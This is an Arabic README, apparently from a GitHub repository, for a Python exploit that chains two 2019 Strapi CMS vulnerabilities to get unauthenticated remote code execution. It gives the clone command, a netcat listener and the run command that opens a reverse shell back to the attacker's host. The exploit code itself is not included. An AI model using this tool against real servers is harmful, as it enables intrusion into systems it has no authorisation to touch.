
سكربت استغلال يستعرض مزيجًا من CVE-2019-18818 وCVE-2019-19609 لتنفيذ تعليمات برمجية عن بُعد دون مصادقة في Strapi CMS.
سكربت استغلال يعرض مزيجًا من CVE-2019-18818 وCVE-2019-19609 لتنفيذ الأوامر عن بُعد دون مصادقة في Strapi CMS.
يستغل هذا السكربت ثغرة في إصدارات Strapi CMS حتى 3.0.0-beta.17.4 وما دونها، مما يسمح بتنفيذ الأوامر عن بُعد دون مصادقة.
تعمل الأداة عن طريق استغلال ثغرة إعادة تعيين كلمة المرور أولاً للحصول على رمز JSON Web Token (JWT) لمستخدم إداري. ثم يُستخدم هذا الرمز لإرسال حمولة خبيثة إلى Strapi CMS، مما يؤدي إلى فتح قشرة عكسية (reverse shell) تعود إلى جهاز المهاجم.
استنساخ المستودع:
git clone https://github.com/Hackhoven/Strapi-RCE.git
الانتقال إلى المجلد
cd Strapi-RCE/
إعداد مستمع Netcat
nc -nlvp <LPORT>
تشغيل السكربت مع عنوان الهدف وعنوان IP للجهاز المحلي ومنفذ الجهاز المحلي كوسائط
python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
هذا السكربت مخصص للأغراض التعليمية فقط. لا يوافق المؤلف ولا يدعم استخدام هذا السكربت في أنشطة غير قانونية أو غير أخلاقية. يجب استخدام هذا السكربت فقط في أبحاث الأمان القانونية أو بيئات CTF. الاستخدام على مسؤوليتك الخاصة.
صُنع بواسطة Hackhoven